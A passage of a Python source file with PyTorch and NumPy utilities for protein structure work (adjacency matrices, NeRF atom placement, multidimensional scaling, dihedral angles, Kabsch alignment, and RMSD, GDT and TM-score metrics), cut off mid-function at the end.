    return tuple(torch.nonzero(m) for m in masks)
def scn_atom_embedd(scn_seq):
    """ Returns the token for each atom in the aa.
        Inputs:
        * scn_seq: sequence(s) as provided by Sidechainnet package (int tensor/s)
    """
    device = scn_seq.device
    # build on cpu, then move each row back to the original device
    per_seq_tokens = []
    for seq in scn_seq.cpu():
        residue_tokens = [CUSTOM_INFO[VOCAB.int2char(aa.item())]["atom_id_embedd"] for aa in seq]
        per_seq_tokens.append(torch.tensor(residue_tokens).long().to(device).unsqueeze(0))
    return torch.cat(per_seq_tokens, dim=0)
def nth_deg_adjacency(adj_mat, n=1, sparse=False):
    """ Calculates the n-th degree adjacency matrix.
        Performs mm of adj_mat and adds the newly added.
        Default is dense. Mods for sparse version are done when needed.
        Inputs:
        * adj_mat: (N, N) adjacency tensor
        * n: int. degree of the output adjacency
        * sparse: bool. whether to use torch-sparse module
        Outputs:
        * new_adj_mat: adjacency reachable in exactly n hops (thresholded)
        * attr_mat: degree of connectivity (1 for neighs, 2 for neighs^2, ... )
    """
    adj_mat = adj_mat.float()
    attr_mat = torch.zeros_like(adj_mat)
    new_adj_mat = adj_mat.clone()
    for i in range(n):
        if i == 0:
            attr_mat += adj_mat
            continue
        if i == 1 and sparse:
            # lazily build the sparse representation of the base adjacency
            idxs = adj_mat.nonzero().t()
            vals = adj_mat[idxs[0], idxs[1]]
            new_idxs = idxs.clone()
            new_vals = vals.clone()
        # (m, n) * (n, k), but adj_mats are squared: m=n=k
        # renamed dim to avoid shadowing the `n` (degree) parameter
        m, k, n_dim = 3 * [adj_mat.shape[0]]
        if sparse:
            # NOTE: requires torch_sparse (its import is commented out at file top)
            new_idxs, new_vals = torch_sparse.spspmm(new_idxs, new_vals, idxs, vals, m=m, k=k, n=n_dim)
            new_vals = new_vals.bool().float()
            new_adj_mat = torch.zeros_like(attr_mat)
            new_adj_mat[new_idxs[0], new_idxs[1]] = new_vals
            # sparse to dense is slower
            # torch.sparse.FloatTensor(idxs, vals).to_dense()
        else:
            new_adj_mat = (new_adj_mat @ adj_mat).bool().float()
        # bug fix: `masked_fill` is out-of-place and its result was discarded,
        # so degrees > 1 were never recorded. Fill in place, and only tag
        # positions newly reached at this degree (don't overwrite lower degrees).
        attr_mat.masked_fill_(new_adj_mat.bool() & ~attr_mat.bool(), i + 1)
    return new_adj_mat, attr_mat
def prot_covalent_bond(seqs, adj_degree=1, cloud_mask=None, mat=True):
    """ Returns the idxs of covalent bonds for a protein.
        Inputs
        * seq: (b, n) torch long.
        * adj_degree: int. adjacency degree
        * cloud_mask: mask selecting the present atoms.
        * mat: whether to return as indexes or matrices.
               for indexes, only 1 seq is supported
        Outputs: edge_idxs, edge_attrs
    """
    # NOTE(review): `cloud_mask` is accepted but never used in this body — confirm
    device = seqs.device
    # get starting poses for every aa
    # adjacency over all 14 atom slots of each residue (sidechainnet layout)
    adj_mat = torch.zeros(seqs.shape[0], seqs.shape[1]*14, seqs.shape[1]*14)
    # not needed to device since it's only for indices.
    # scaff marks slot 0 of each residue -> absolute atom offset of every aa
    scaff = torch.zeros(seqs.shape[1], 14)
    scaff[:, 0] = 1
    idxs = torch.nonzero(scaff).reshape(-1)
    for s,seq in enumerate(seqs):
        for i,idx in enumerate(idxs):
            if i >= seq.shape[0]:
                break
            # offset by pos in chain ( intra-aa bonds + with next aa )
            # NOTE(review): [[2, 14]] presumably links this residue's slot 2 to the
            # next residue's slot 0 (offset 14) — confirm against constants.AA_DATA
            bonds = idx + torch.tensor( constants.AA_DATA[VOCAB.int2char(seq[i].item())]['bonds'] + [[2, 14]] ).t()
            # delete link with next if final AA in seq
            if i == idxs.shape[0]-1:
                bonds = bonds[:, :-1]
            # modify adj mat
            adj_mat[s, bonds[0], bonds[1]] = 1
        # convert to undirected
        adj_mat[s] = adj_mat[s] + adj_mat[s].t()
    # do N_th degree adjacency
    adj_mat, attr_mat = nth_deg_adjacency(adj_mat, n=adj_degree, sparse=False) # True
    if mat:
        return attr_mat.bool().to(seqs.device), attr_mat.to(device)
    else:
        # index form: only the first sequence in the batch is considered
        edge_idxs = attr_mat[0].nonzero().t().long()
        edge_attrs = attr_mat[0, edge_idxs[0], edge_idxs[1]]
        return edge_idxs.to(seqs.device), edge_attrs.to(seqs.device)
def nerf_torch(a, b, c, l, theta, chi):
    """ Custom Natural extension of Reference Frame.
        Inputs:
        * a: (batch, 3) or (3,). point(s) of the plane, not connected to d
        * b: (batch, 3) or (3,). point(s) of the plane, not connected to d
        * c: (batch, 3) or (3,). point(s) of the plane, connected to d
        * l: (batch,) or float. bond length(s) c-d
        * theta: (batch,) or (float). angle(s) between b-c-d
        * chi: (batch,) or float. dihedral angle(s) between the a-b-c and b-c-d planes
        Outputs: d (batch, 3) or (3,). the next point in the sequence, linked to c
    """
    # angles must come in radians within [-pi, pi]
    if not ( (-np.pi <= theta) * (theta <= np.pi) ).all().item():
        raise ValueError(f"theta(s) must be in radians and in [-pi, pi]. theta(s) = {theta}")
    # vectors spanning the reference plane
    ba = b - a
    cb = c - b
    # rotation matrix from the plane normals, column-normalized
    normal = torch.cross(ba, cb, dim=-1)
    normal_ = torch.cross(normal, cb, dim=-1)
    frame = torch.stack([cb, normal_, normal], dim=-1)
    frame = frame / torch.norm(frame, dim=-2, keepdim=True)
    # prototype point in spherical form, then rotate into the frame
    sin_t, cos_t = torch.sin(theta), torch.cos(theta)
    sin_x, cos_x = torch.sin(chi), torch.cos(chi)
    proto = torch.stack([-cos_t, sin_t * cos_x, sin_t * sin_x], dim=-1).unsqueeze(-1)
    # extend base point, set length
    return c + l.unsqueeze(-1) * torch.matmul(frame, proto).squeeze()
def sidechain_container(backbones, n_aa, cloud_mask=None, place_oxygen=False,
                        n_atoms=NUM_COORDS_PER_RES, padding=GLOBAL_PAD_CHAR):
    """ Gets a backbone of the protein, returns the whole coordinates
        with sidechains (same format as sidechainnet). Keeps differentiability.
        Inputs:
        * backbones: (batch, L*3, 3): assume batch=1 (could be extended later).
                     Coords for (N-term, C-alpha, C-term) of every aa.
        * n_aa: int. number of points for each aa in the backbones.
        * cloud_mask: (batch, l, c). optional. cloud mask from scn_cloud_mask`.
                      returns point outside to 0. if passed, else c_alpha
        * place_oxygen: whether to claculate the oxygen of the
                        carbonyl group via NeRF
        * n_atoms: int. n of atom positions / atom. same as in sidechainnet: 14
        * padding: int. padding token. same as in sidechainnet: 0
        Outputs: whole coordinates of shape (batch, L, n_atoms, 3)
    """
    # NOTE(review): `n_atoms` and `padding` are accepted but unused below — confirm
    device = backbones.device
    batch, length = backbones.shape[0], backbones.shape[1] // n_aa
    # build scaffold from (N, CA, C, CB)
    new_coords = torch.zeros(batch, length, NUM_COORDS_PER_RES, 3).to(device)
    predicted = rearrange(backbones, 'b (l back) d -> b l back d', l=length)
    # set backbone positions
    new_coords[:, :, :3] = predicted[:, :, :3]
    # set rest of positions to c_beta if present, else c_alpha
    if n_aa == 4:
        new_coords[:, :, 4:] = repeat(predicted[:, :, -1], 'b l d -> b l scn d', scn=10)
    else:
        new_coords[:, :, 4:] = repeat(new_coords[:, :, 1], 'b l d -> b l scn d', scn=10)
    if cloud_mask is not None:
        new_coords[torch.logical_not(cloud_mask)] = 0.
    # hard-calculate oxygen position of carbonyl group with parallel version of NERF
    if place_oxygen:
        # build (=O) position of revery aa in each chain
        # NOTE(review): `get_dihedral_torch` is defined elsewhere in the package
        for s in range(batch):
            # dihedrals phi=f(c-1, n, ca, c) & psi=f(n, ca, c, n+1)
            # phi = get_dihedral_torch(*backbone[s, i*3 - 1 : i*3 + 3]) if i>0 else None
            psis = torch.tensor([ get_dihedral_torch(*backbones[s, i*3 + 0 : i*3 + 4] )if i < length-1 else np.pi*5/4 \
                     for i in range(length) ])
            # the angle for placing oxygen is opposite to psi of current res.
            # psi not available for last one so pi/4 taken for now
            bond_lens = repeat(torch.tensor(BB_BUILD_INFO["BONDLENS"]["c-o"]), ' -> b', b=length).to(psis.device)
            bond_angs = repeat(torch.tensor(BB_BUILD_INFO["BONDANGS"]["ca-c-o"]), ' -> b', b=length).to(psis.device)
            correction = repeat(torch.tensor(-np.pi), ' -> b', b=length).to(psis.device)
        # NOTE(review): this assignment sits outside the `for s` loop, so only the
        # last batch element's psis are used for every batch entry — confirm intent
        new_coords[:, :, 3] = nerf_torch(new_coords[:, :, 0],
                                         new_coords[:, :, 1],
                                         new_coords[:, :, 2],
                                         bond_lens, bond_angs, psis + correction)
    else:
        # init oxygen to carbonyl
        new_coords[:, :, 3] = predicted[:, :, 2]
    return new_coords
# distance utils (distogram to dist mat + masking)
def center_distogram_torch(distogram, bins=DISTANCE_THRESHOLDS, min_t=1., center="mean", wide="std"):
    """ Returns the central estimate of a distogram, plus confidence weights.
        Inputs:
        * distogram: (batch, N, N, B) where B is the number of buckets.
        * bins: (B,) containing the cutoffs for the different buckets
        * min_t: float. lower bound for distances. (currently unused)
        * center: str. "mean" or "median". centrality estimator per (i, j).
        * wide: str. "var" or "std" for dispersion-based weighting;
                any other value yields zero dispersion (uniform weights).
        Outputs:
        * central: (batch, N, N) central distance estimate.
        * weights: (batch, N, N) weights in [0, 1]; 0 on the diagonal,
                   on NaNs, and where central falls in the last (ignore) bin.
    """
    shape, device = distogram.shape, distogram.device
    # threshold to weights and find mean value of each bin
    n_bins = ( bins - 0.5 * (bins[2] - bins[1]) ).to(device)
    n_bins[0]  = 1.5
    n_bins[-1] = 1.33*bins[-1] # above last threshold is ignored
    max_bin_allowed = torch.tensor(n_bins.shape[0]-1).to(device).long()
    # calculate measures of centrality and dispersion -
    magnitudes = distogram.sum(dim=-1)
    if center == "median":
        cum_dist = torch.cumsum(distogram, dim=-1)
        medium   = 0.5 * cum_dist[..., -1:]
        central  = torch.searchsorted(cum_dist, medium).squeeze()
        central  = n_bins[ torch.min(central, max_bin_allowed) ]
    elif center == "mean":
        central  = (distogram * n_bins).sum(dim=-1) / magnitudes
    else:
        # fail fast: previously any other value fell through both branches
        # and raised a NameError on `central` further down
        raise ValueError(f"center must be 'mean' or 'median', got {center!r}")
    # create mask for last class - (IGNORE_INDEX)
    mask = (central <= bins[-2].item()).float()
    # mask diagonal to 0 dist - don't do masked filling to avoid inplace errors
    diag_idxs = np.arange(shape[-2])
    central   = expand_dims_to(central, 3 - len(central.shape))
    central[:, diag_idxs, diag_idxs] *= 0.
    # provide weights
    if wide == "var":
        dispersion = (distogram * (n_bins - central.unsqueeze(-1))**2).sum(dim=-1) / magnitudes
    elif wide == "std":
        dispersion = ((distogram * (n_bins - central.unsqueeze(-1))**2).sum(dim=-1) / magnitudes).sqrt()
    else:
        dispersion = torch.zeros_like(central, device=device)
    # rescale to 0-1. lower std / var --> weight=1. set potential nan's to 0
    weights = mask / (1+dispersion)
    weights[weights != weights] *= 0.
    weights[:, diag_idxs, diag_idxs] *= 0.
    return central, weights
# distance matrix to 3d coords: https://github.com/scikit-learn/scikit-learn/blob/42aff4e2e/sklearn/manifold/_mds.py#L279
def mds_torch(pre_dist_mat, weights=None, iters=10, tol=1e-5, eigen=False, verbose=2):
    """ Gets distance matrix. Outputs 3d. See below for wrapper.
        Assumes (for now) distogram is (N x N) and symmetric
        Inputs:
        * pre_dist_mat: (N, N) or (batch, N, N) target distance matrix.
        * weights: optional (batch, N, N) relative weights for the stress.
        * iters: int. max number of Guttman-transform iterations.
        * tol: float. stop when the mean relative stress improvement
               drops to this value or below.
        * eigen: bool. if True (and weights is None) return the closed-form
                 eigendecomposition embedding without iterating.
        * verbose: int. >=2 prints per-iteration stress; >=1 prints breaks.
        Outs:
        * best_3d_coords: (batch x 3 x N)
        * historic_stresses: (batch x steps)
    """
    device, dtype = pre_dist_mat.device, pre_dist_mat.type()
    # ensure batched MDS
    pre_dist_mat = expand_dims_to(pre_dist_mat, length = ( 3 - len(pre_dist_mat.shape) ))
    # start
    batch, N, _ = pre_dist_mat.shape
    diag_idxs = np.arange(N)
    # history starts at +inf so the first iteration always improves
    his = [torch.tensor([np.inf]*batch, device=device)]
    # initialize by eigendecomposition: https://www.lptmc.jussieu.fr/user/lesne/bioinformatics.pdf
    # follow : https://www.biorxiv.org/content/10.1101/2020.11.27.401232v1.full.pdf
    D = pre_dist_mat**2
    # double-centered Gram-like matrix built from the first row/column
    M = 0.5 * (D[:, :1, :] + D[:, :, :1] - D)
    # do loop svd bc it's faster: (2-3x in CPU and 1-2x in GPU)
    # https://discuss.pytorch.org/t/batched-svd-lowrank-being-much-slower-than-loop-implementation-both-cpu-and-gpu/119336
    svds = [torch.svd_lowrank(mi) for mi in M]
    u = torch.stack([svd[0] for svd in svds], dim=0)
    s = torch.stack([svd[1] for svd in svds], dim=0)
    v = torch.stack([svd[2] for svd in svds], dim=0)
    # coords = U * sqrt(S); keep only the 3 leading components
    best_3d_coords = torch.bmm(u, torch.diag_embed(s).sqrt())[..., :3]
    # only eigen - way faster but not weights
    if weights is None and eigen==True:
        return torch.transpose( best_3d_coords, -1, -2), torch.zeros_like(torch.stack(his, dim=0))
    elif eigen==True:
        if verbose:
            print("Can't use eigen flag if weights are active. Fallback to iterative")
    # continue the iterative way
    if weights is None:
        weights = torch.ones_like(pre_dist_mat)
    # iterative updates:
    for i in range(iters):
        # compute distance matrix of coords and stress
        best_3d_coords = best_3d_coords.contiguous()
        dist_mat = torch.cdist(best_3d_coords, best_3d_coords, p=2).clone()
        stress = ( weights * (dist_mat - pre_dist_mat)**2 ).sum(dim=(-1,-2)) * 0.5
        # perturb - update X using the Guttman transform - sklearn-like
        # guard against division by zero in the ratio below
        dist_mat[ dist_mat <= 0 ] += 1e-7
        ratio = weights * (pre_dist_mat / dist_mat)
        B = -ratio
        B[:, diag_idxs, diag_idxs] += ratio.sum(dim=-1)
        # update
        coords = (1. / N * torch.matmul(B, best_3d_coords))
        # `dis` normalizes the stress so the tolerance check is scale-free
        dis = torch.norm(coords, dim=(-1, -2))
        if verbose >= 2:
            print('it: %d, stress %s' % (i, stress))
        # update metrics if relative improvement above tolerance
        if (his[-1] - stress / dis).mean() <= tol:
            if verbose:
                print('breaking at iteration %d with stress %s' % (i,
                                                                   stress / dis))
            break
        best_3d_coords = coords
        his.append( stress / dis )
    return torch.transpose(best_3d_coords, -1,-2), torch.stack(his, dim=0)
def mds_numpy(pre_dist_mat, weights=None, iters=10, tol=1e-5, eigen=False, verbose=2):
    """ Gets distance matrix. Outputs 3d. See below for wrapper.
        Assumes (for now) distrogram is (N x N) and symmetric
        Inputs:
        * pre_dist_mat: (N, N) or (batch, N, N) target distance matrix.
        * weights: optional (batch, N, N) relative weights for the stress.
        * iters: int. max number of Guttman-transform iterations.
        * tol: float. stop when the mean relative stress improvement
               drops to this value or below.
        * eigen: bool. accepted for signature parity with `mds_torch`,
                 but unused here - this version always iterates.
        * verbose: int. >=2 prints per-iteration stress; >=1 prints breaks.
        Out:
        * best_3d_coords: (3 x N)
        * historic_stress
    """
    if weights is None:
        weights = np.ones_like(pre_dist_mat)
    # ensure batched MDS
    pre_dist_mat = expand_dims_to(pre_dist_mat, length = ( 3 - len(pre_dist_mat.shape) ))
    # start
    batch, N, _ = pre_dist_mat.shape
    # NOTE(review): `his` starts with a scalar and later collects (batch,)
    # arrays, so np.array(his) at the end is ragged for batch > 1 - verify
    his = [np.inf]
    # init random coords
    best_stress = np.inf * np.ones(batch)
    # random coords in [-1, 1)
    best_3d_coords = 2*np.random.rand(batch, 3, N) - 1
    # iterative updates:
    for i in range(iters):
        # compute distance matrix of coords and stress
        dist_mat = np.linalg.norm(best_3d_coords[:, :, :, None] - best_3d_coords[:, :, None, :], axis=-3)
        stress = (( weights * (dist_mat - pre_dist_mat) )**2).sum(axis=(-1, -2)) * 0.5
        # perturb - update X using the Guttman transform - sklearn-like
        # guard against division by zero in the ratio below
        dist_mat[dist_mat == 0] = 1e-7
        ratio = weights * (pre_dist_mat / dist_mat)
        B = -ratio
        B[:, np.arange(N), np.arange(N)] += ratio.sum(axis=-1)
        # update - double transpose. TODO: consider fix
        coords = (1. / N * np.matmul(best_3d_coords, B))
        # `dis` normalizes the stress so the tolerance check is scale-free
        dis = np.linalg.norm(coords, axis=(-1, -2))
        if verbose >= 2:
            print('it: %d, stress %s' % (i, stress))
        # update metrics if relative improvement above tolerance
        if (best_stress - stress / dis).mean() <= tol:
            if verbose:
                print('breaking at iteration %d with stress %s' % (i,
                                                                   stress / dis))
            break
        best_3d_coords = coords
        best_stress = stress / dis
        his.append(best_stress)
    return best_3d_coords, np.array(his)
def get_dihedral_torch(c1, c2, c3, c4):
    """ Returns the dihedral angle in radians.
        Uses the atan2 formulation from:
        https://en.wikipedia.org/wiki/Dihedral_angle#In_polymer_physics
        (torch.dot is avoided since it does not broadcast)
        Inputs:
        * c1: (batch, 3) or (3,) coords of the 1st point
        * c2: (batch, 3) or (3,) coords of the 2nd point
        * c3: (batch, 3) or (3,) coords of the 3rd point
        * c4: (batch, 3) or (3,) coords of the 4th point
        Output: (batch,) or scalar tensor with the signed angle.
    """
    # consecutive bond vectors along the 4-point chain
    b1 = c2 - c1
    b2 = c3 - c2
    b3 = c4 - c3
    # atan2( |b2| * b1.(b2 x b3) , (b1 x b2).(b2 x b3) )
    cross_23 = torch.cross(b2, b3, dim=-1)
    y = ((torch.norm(b2, dim=-1, keepdim=True) * b1) * cross_23).sum(dim=-1)
    x = (torch.cross(b1, b2, dim=-1) * cross_23).sum(dim=-1)
    return torch.atan2(y, x)
def get_dihedral_numpy(c1, c2, c3, c4):
    """ Returns the dihedral angle in radians.
        Uses the atan2 formulation from:
        https://en.wikipedia.org/wiki/Dihedral_angle#In_polymer_physics
        Inputs:
        * c1: (batch, 3) or (3,) coords of the 1st point
        * c2: (batch, 3) or (3,) coords of the 2nd point
        * c3: (batch, 3) or (3,) coords of the 3rd point
        * c4: (batch, 3) or (3,) coords of the 4th point
        Output: (batch,) or scalar array with the signed angle.
    """
    # consecutive bond vectors along the 4-point chain
    b1, b2, b3 = c2 - c1, c3 - c2, c4 - c3
    # arctan2( |b2| * b1.(b2 x b3) , (b1 x b2).(b2 x b3) )
    cross_23 = np.cross(b2, b3, axis=-1)
    y = ((np.linalg.norm(b2, axis=-1, keepdims=True) * b1) * cross_23).sum(axis=-1)
    x = (np.cross(b1, b2, axis=-1) * cross_23).sum(axis=-1)
    return np.arctan2(y, x)
def calc_phis_torch(pred_coords, N_mask, CA_mask, C_mask=None,
                    prop=True, verbose=0):
    """ Filters mirrors selecting the 1 with most N of negative phis.
        Used as part of the MDScaling wrapper if arg is passed. See below.
        Angle Phi between planes: (Cterm{-1}, N, Ca{0}) and (N{0}, Ca{+1}, Cterm{+1})
        Inputs:
        * pred_coords: (batch, 3, N) predicted coordinates
        * N_mask: (batch, N) boolean mask for N-term positions
        * CA_mask: (batch, N) boolean mask for C-alpha positions
        * C_mask: (batch, N) or None. boolean mask for C-term positions or
                  automatically calculate from N_mask and CA_mask if None.
        * prop: bool. whether to return as a proportion of negative phis.
        * verbose: bool. verbosity level
        Output: (batch, N) containing the phi angles or (batch,) containing
                the proportions.
        Note: use [0] since all prots in batch have same backbone
    """
    # detach gradients and work on a cpu copy as (batch, N, 3)
    coords = torch.transpose(pred_coords.detach(), -1, -2).cpu()
    # normalize masks to 2 dims
    N_mask = expand_dims_to(N_mask, 2 - len(N_mask.shape))
    CA_mask = expand_dims_to(CA_mask, 2 - len(CA_mask.shape))
    if C_mask is None:
        # anything that is neither N nor CA is treated as the carbonyl C
        C_mask = torch.logical_not(torch.logical_or(N_mask, CA_mask))
    else:
        C_mask = expand_dims_to(C_mask, 2 - len(C_mask.shape))
    # same backbone layout for every protein in the batch -> index with [0]
    n_terms = coords[:, N_mask[0].squeeze()]
    c_alphas = coords[:, CA_mask[0].squeeze()]
    c_terms = coords[:, C_mask[0].squeeze()]
    # one phi series per protein in the batch
    phis = []
    for i in range(pred_coords.shape[0]):
        phis.append(get_dihedral_torch(c_terms[i, :-1],
                                       n_terms[i, 1:],
                                       c_alphas[i, 1:],
                                       c_terms[i, 1:]))
    if not prop:
        return phis
    # fraction of negative phis per protein
    return torch.tensor([(x < 0).float().mean().item() for x in phis])
def calc_phis_numpy(pred_coords, N_mask, CA_mask, C_mask=None,
                    prop=True, verbose=0):
    """ Filters mirrors selecting the 1 with most N of negative phis.
        Used as part of the MDScaling wrapper if arg is passed. See below.
        Angle Phi between planes: (Cterm{-1}, N, Ca{0}) and (N{0}, Ca{+1}, Cterm{+1})
        Inputs:
        * pred_coords: (batch, 3, N) predicted coordinates
        * N_mask: (N, ) boolean mask for N-term positions
        * CA_mask: (N, ) boolean mask for C-alpha positions
        * C_mask: (N, ) or None. boolean mask for C-term positions or
                  automatically calculate from N_mask and CA_mask if None.
        * prop: bool. whether to return as a proportion of negative phis.
        * verbose: bool. verbosity level
        Output: (batch, N) containing the phi angles or (batch,) containing
                the proportions.
    """
    # work on a (batch, N, 3) view of the predicted coords
    coords = np.transpose(pred_coords, (0, 2, 1))
    n_terms = coords[:, N_mask.squeeze()]
    c_alphas = coords[:, CA_mask.squeeze()]
    # select c_term auto if not passed
    if C_mask is None:
        # anything that is neither N nor CA is treated as the carbonyl C
        rest = (np.ones_like(N_mask) - N_mask - CA_mask).squeeze().astype(bool)
        c_terms = coords[:, rest]
    else:
        c_terms = coords[:, C_mask]
    # one phi series per protein in the batch
    phis = []
    for i in range(pred_coords.shape[0]):
        phis.append(get_dihedral_numpy(c_terms[i, :-1],
                                       n_terms[i, 1:],
                                       c_alphas[i, 1:],
                                       c_terms[i, 1:]))
    if not prop:
        return phis
    # fraction of negative phis per protein
    return np.array([(x < 0).mean() for x in phis])
# alignment by centering + rotation to compute optimal RMSD
# adapted from : https://github.com/charnley/rmsd/
def kabsch_torch(X, Y, cpu=True):
    """ Kabsch alignment of X into Y.
        Assumes X,Y are both (Dims x N_points). See below for wrapper.
        Inputs:
        * X: (D, N) coords to be rotated onto Y.
        * Y: (D, N) reference coords.
        * cpu: bool. run the SVD on cpu.
        Outputs: (X_, Y_) where both are centered at the origin and X_ has
        been rotated by the optimal (proper) rotation onto Y_.
    """
    device = X.device
    # center X and Y to the origin
    X_ = X - X.mean(dim=-1, keepdim=True)
    Y_ = Y - Y.mean(dim=-1, keepdim=True)
    # calculate covariance matrix (for each prot in the batch)
    C = torch.matmul(X_, Y_.t()).detach()
    if cpu:
        C = C.cpu()
    # Optimal rotation matrix via SVD.
    # torch.linalg.svd (returns V^H directly) exists from torch 1.8 on.
    # bugfix: compare (major, minor) - the old check only read the minor
    # version, which wrongly sent torch >= 2.0 down the legacy path.
    major, minor = (int(v) for v in torch.__version__.split(".")[:2])
    if (major, minor) < (1, 8):
        # warning! in torch 1.<8 : W must be transposed to match V^H
        V, S, W = torch.svd(C)
        W = W.t()
    else:
        V, S, W = torch.linalg.svd(C)
    # determinant sign for direction correction (avoid reflections)
    d = (torch.det(V) * torch.det(W)) < 0.0
    if d:
        S[-1]    = S[-1] * (-1)
        V[:, -1] = V[:, -1] * (-1)
    # Create Rotation matrix U
    U = torch.matmul(V, W).to(device)
    # calculate rotations
    X_ = torch.matmul(X_.t(), U).t()
    # return centered and aligned
    return X_, Y_
def kabsch_numpy(X, Y):
    """ Kabsch alignment of X into Y.
        Assumes X,Y are both (Dims x N_points). See below for wrapper.
        Outputs: (X_, Y_) where both are centered at the origin and X_ has
        been rotated by the optimal (proper) rotation onto Y_.
    """
    # center both point clouds at the origin
    X_ = X - X.mean(axis=-1, keepdims=True)
    Y_ = Y - Y.mean(axis=-1, keepdims=True)
    # covariance matrix between the two clouds
    cov = np.dot(X_, Y_.transpose())
    # optimal rotation via SVD
    V, S, W = np.linalg.svd(cov)
    # correct for reflections (det < 0) so we return a proper rotation
    if np.linalg.det(V) * np.linalg.det(W) < 0.0:
        S[-1] = -S[-1]
        V[:, -1] = -V[:, -1]
    # rotation matrix and rotated coords
    U = np.dot(V, W)
    X_ = np.dot(X_.T, U).T
    # return centered and aligned
    return X_, Y_
# metrics - more formulas here: http://predictioncenter.org/casp12/doc/help.html
def distmat_loss_torch(X=None, Y=None, X_mat=None, Y_mat=None, p=2, q=2, custom=None, distmat_mask=None):
    """ Calculates a loss on the distance matrix - no need to align structs.
        Inputs:
        * X: (N, d) tensor. the predicted structure. One of (X, X_mat) is needed.
        * X_mat: (N, N) tensor. the predicted distance matrix. Optional ()
        * Y: (N, d) tensor. the true structure. One of (Y, Y_mat) is needed.
        * Y_mat: (N, N) tensor. the predicted distance matrix. Optional ()
        * p: int. power for the distance calculation (2 for euclidean)
        * q: float. power for the scaling of the loss (2 for MSE, 1 for MAE, etc)
        * custom: func or None. custom loss over distance matrices.
          ex: lambda x,y: 1 - 1/ (1 + ((x-y))**2) (1 is very bad. 0 is good)
        * distmat_mask: (N, N) mask (boolean or weights for each ij pos). optional.
    """
    assert (X is not None or X_mat is not None) and \
           (Y is not None or Y_mat is not None), "The true and predicted coords or dist mats must be provided"
    # calculate distance matrices from coords when not passed directly
    if X_mat is None:
        X_mat = torch.cdist(X, X, p=p)
    if Y_mat is None:
        Y_mat = torch.cdist(Y, Y, p=p)
    if distmat_mask is None:
        distmat_mask = torch.ones_like(Y_mat).bool()
    # do custom expression if passed: mask first, then reduce.
    # bugfix: the original did .mean() here and then indexed the resulting
    # 0-dim scalar with `distmat_mask` below, raising an IndexError.
    if custom is not None:
        return custom(X_mat, Y_mat)[distmat_mask].mean()
    # **2 ensures always positive. Later scale back to desired power
    loss = ( X_mat - Y_mat )**2
    if q != 2:
        loss = loss**(q/2)
    return loss[distmat_mask].mean()
def rmsd_torch(X, Y):
    """ Root-mean-square deviation between two point sets.
        Assumes x,y are both (B x D x N). See below for wrapper. """
    squared_diff = (X - Y) ** 2
    return squared_diff.mean(dim=(-1, -2)).sqrt()
def rmsd_numpy(X, Y):
    """ Root-mean-square deviation between two point sets.
        Assumes x,y are both (B x D x N). See below for wrapper. """
    squared_diff = (X - Y) ** 2
    return np.sqrt(squared_diff.mean(axis=(-1, -2)))
def gdt_torch(X, Y, cutoffs, weights=None):
    """ Global Distance Test. Assumes x,y are both (B x D x N). see below for wrapper.
        * cutoffs is a list of `K` thresholds
        * weights is a list of `K` weights (1 x each threshold)
    """
    device = X.device
    # default to uniform weighting over the thresholds
    if weights is None:
        weights = torch.ones(1, len(cutoffs))
    else:
        weights = torch.tensor([weights]).to(device)
    # per-point euclidean deviation
    dist = ((X - Y) ** 2).sum(dim=1).sqrt()
    # fraction of points under each threshold
    GDT = torch.zeros(X.shape[0], len(cutoffs), device=device)
    for i, cutoff in enumerate(cutoffs):
        GDT[:, i] = (dist <= cutoff).float().mean(dim=-1)
    # weighted mean over thresholds
    return (GDT * weights).mean(-1)
def gdt_numpy(X, Y, cutoffs, weights=None):
    """ Global Distance Test. Assumes x,y are both (B x D x N). see below for wrapper.
        * cutoffs is a list of `K` thresholds
        * weights is a list of `K` weights (1 x each threshold)
    """
    # default to uniform weighting over the thresholds
    weights = np.ones((1, len(cutoffs))) if weights is None else np.array([weights])
    # per-point euclidean deviation
    dist = np.sqrt(((X - Y) ** 2).sum(axis=1))
    # fraction of points under each threshold
    GDT = np.zeros((X.shape[0], len(cutoffs)))
    for i, cutoff in enumerate(cutoffs):
        GDT[:, i] = (dist <= cutoff).mean(axis=-1)
    # weighted mean over thresholds
    return (GDT * weights).mean(-1)
def tmscore_torch(X, Y):
    """ Template Modeling score. Assumes x,y are both (B x D x N). see below for wrapper. """
    n_points = X.shape[-1]
    # length-dependent normalization constant
    d0 = 1.24 * np.cbrt(n_points - 15) - 1.8
    # per-point euclidean deviation
    dist = ((X - Y) ** 2).sum(dim=1).sqrt()
    # formula (see wrapper for source):
    return torch.mean(1 / (1 + (dist / d0) ** 2), dim=-1)
def tmscore_numpy(X, Y):
    """ Template Modeling score. Assumes x,y are both (B x D x N). see below for wrapper. """
    n_points = X.shape[-1]
    # length-dependent normalization constant
    d0 = 1.24 * np.cbrt(n_points - 15) - 1.8
    # per-point euclidean deviation
    dist = np.sqrt(((X - Y) ** 2).sum(axis=1))
    # formula (see wrapper for source):
    return np.mean(1 / (1 + (dist / d0) ** 2), axis=-1)
def mdscaling_torch(pre_dist_mat, weights=None, iters=10, tol=1e-5,
                    fix_mirror=True, N_mask=None, CA_mask=None, C_mask=None,
                    eigen=False, verbose=2):
    """ Handles the specifics of MDS for proteins (mirrors, ...) """
    # run batched mds for the whole batch in parallel
    preds, stresses = mds_torch(pre_dist_mat, weights=weights, iters=iters,
                                tol=tol, eigen=eigen, verbose=verbose)
    if fix_mirror:
        # no need to calculate multiple mirrors - just correct the Z axis:
        # flip any struct whose proportion of negative phis is below 1/2
        phi_ratios = calc_phis_torch(preds, N_mask, CA_mask, C_mask, prop=True)
        to_correct = torch.nonzero(phi_ratios < 0.5).view(-1)
        preds[to_correct, -1] = (-1) * preds[to_correct, -1]
        if verbose == 2:
            print("Corrected mirror idxs:", to_correct)
    return preds, stresses
def mdscaling_numpy(pre_dist_mat, weights=None, iters=10, tol=1e-5,
                    fix_mirror=True, N_mask=None, CA_mask=None, C_mask=None, verbose=2):
    """ Handles the specifics of MDS for proteins (mirrors, ...)
        Inputs (see the `MDScaling` wrapper for full docs):
        * pre_dist_mat: target distance matrix.
        * fix_mirror: bool. flip the Z axis of mirrored structures.
        * N_mask / CA_mask / C_mask: backbone masks, used only if fix_mirror.
        Outputs: (preds, stresses) from `mds_numpy`, with mirrored structs
        Z-flipped when fix_mirror is set.
    """
    # batched mds for full parallel
    preds, stresses = mds_numpy(pre_dist_mat, weights=weights,iters=iters,
                                tol=tol, verbose=verbose)
    if not fix_mirror:
        return preds, stresses
    # no need to calculate multiple mirrors - just correct Z axis
    phi_ratios = calc_phis_numpy(preds, N_mask, CA_mask, C_mask, prop=True)
    for i, pred in enumerate(preds):
